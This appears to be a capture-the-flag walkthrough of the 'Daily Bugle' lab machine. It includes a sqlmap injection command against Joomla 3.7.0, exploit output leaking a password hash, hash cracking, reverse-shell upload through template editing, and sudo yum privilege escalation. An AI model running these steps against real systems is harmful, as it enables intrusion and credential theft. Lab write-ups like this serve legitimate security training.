Daily Bugle is a CTF Machine that is kinda hard and involves many methods in order to solve the challenge, so let’s start by accessing it from here
As always, let’s start with Nmap to enumerate Daily Bugle Machine and see which services are available on our target.
nmap -sV -sC Machine_IP
After the scan finishes, you should get something similar to the following
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 08:55 EDT Nmap scan report for 10.10.226.51 Host is up (0.27s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA) | 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA) |_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40) | http-robots.txt: 15 disallowed entries | /joomla/administrator/ /administrator/ /bin/ /cache/ | /cli/ /components/ /includes/ /installation/ /language/ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds
From the results we can know the following:
- SSH service running with asymmetric key authentication
- HTTP service is running, so we can access it from the browser
- we have Robots.txt file along with multiple directories discovered
- and finally the CMS used in joomla
let’s start by opening the browser to the server, and from the home page, we can get the answer of the first question
Access the web server, who robbed the bank?
there’s nothing more on the home page, so let’s check the source code , there’s nothing important there too.
Let’s check the robots.txt file, there’s nothing there other than the admin login page.
before we start doing brute forcing, the next question is about joonla version, which you can get by installing a tool called JoomScan that helps to enumerate the joomla CMS.
first you need to install it with
sudo apt-get install JoomScan
and then we run the tool with the following command
joomscan -u http://Machine_IP
from the results of the scan, we will get the next answer.
What is the Joomla version?
until the tool finishes scanning (nothing important will show that we don’t know about yet), let’s search in exploit-db if there is any known vulnerability that we can exploit to get inside the CMS.
searchsploit joomla 3.7.0
and what do you know, we have two vulnerabilities, one of them is SQL injection
Let’s open the link above, we can see that the CMS is vulnerable by using a simple SQLmap command to the home page,you can use this command but it will take so much time.
sqlmap -u "http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
There’s a hint that we should use a python script, so i searched online for Joomla 3.7.0 SQL injection written in python and i found the following script on github.
so let’s get the script
and then let’s run it against our target, you should get something similar to this
[-] Fetching CSRF token [-] Testing SQLi (' - Found table:', 'fb9j5_users') (' - Extracting users from', 'fb9j5_users') (' [$] Found user', ['811', 'Super User', 'jonah', 'firstname.lastname@example.org', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')
so we have a user along with a password, let’s try to crack the password (Bcrypt hash) with John The Ripper.
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_joomla
and we would get the next answer
What is Jonah’s cracked password?
now let’s login to joomla CMS
after we login, we need to upload a reverse shell so we can control the Daily Bugle Machine and get the flag.
we know that Joomla runs on PHP, so we need a PHP reverse Shell , but when you upload it, joomla won’t allow you, so first we need to allow PHP file upload.
You can allow that by going to Content->Media->options and you should see “Legal Extension” Field, you can also disable “restrict uploads” just in case
But, it didn’t work, you can try to add “php” to “Legal image extensions” , “Legal MIME Types” but it didn’t work.
Another way is to copy the code inside the template that runs PHP, so if you go to Extensions->Templates->Templates you should get the following
if you enlarge the images, you can see that the second one is the one being used, so if we replace the index.php file (the one accessed by default for the home page) then refreshed the page, you should get the reverse shell.
after we get access, let’s head to the home folder
we can see that there’s a user called jjameson, but we don’t have permission to access it, so it’s time for privilege escalation.
If we checked with which “sudo” permissions we have by using
you can see that we have none, so as always, let’s check for the second place which is the crontab.
There’s nothing there, and we don’t have permission to edit the crontab neither
-rw-r--r--. 1 root root 451 Jun 9 2014 /etc/crontab
Since there’s nothing, let’s check the web server files, maybe we have something in configurations
and let’s check what files we have
LICENSE.txt README.txt administrator bin cache cli components configuration.php htaccess.txt images includes index.php language layouts libraries media modules plugins robots.txt templates tmp web.config.txt
let’s check the configuration file.
You should get something similar to this
public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'The Daily Bugle'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; public $db = 'joomla'; public $dbprefix = 'fb9j5_'; public $live_site = ''; public $secret = 'UAMBRWzHO3oFPmVC'; public $gzip = '0'; public $error_reporting = 'default';
so we have a password that might work, i tried the password on mysql and root users but it didn’t work, then i tried it on jjameson and voila !
and we can get our flag from here by going to the user home files
What is the user flag?
now, it’s time to get root privileges, let’s see which sudo commands we can run, by running sudo -l
so let’s see if we can escalate our privileges with this command by checking gtfobins
in order to escalate our privileges with Yum, we have two methods, either create a package and install it, or method b by doing a custom plugin.
I’ll go with method B, after it works fine, you will have root user, you can check by running whoami
What is the root flag?
and finally, we finished Daily Bugle machine.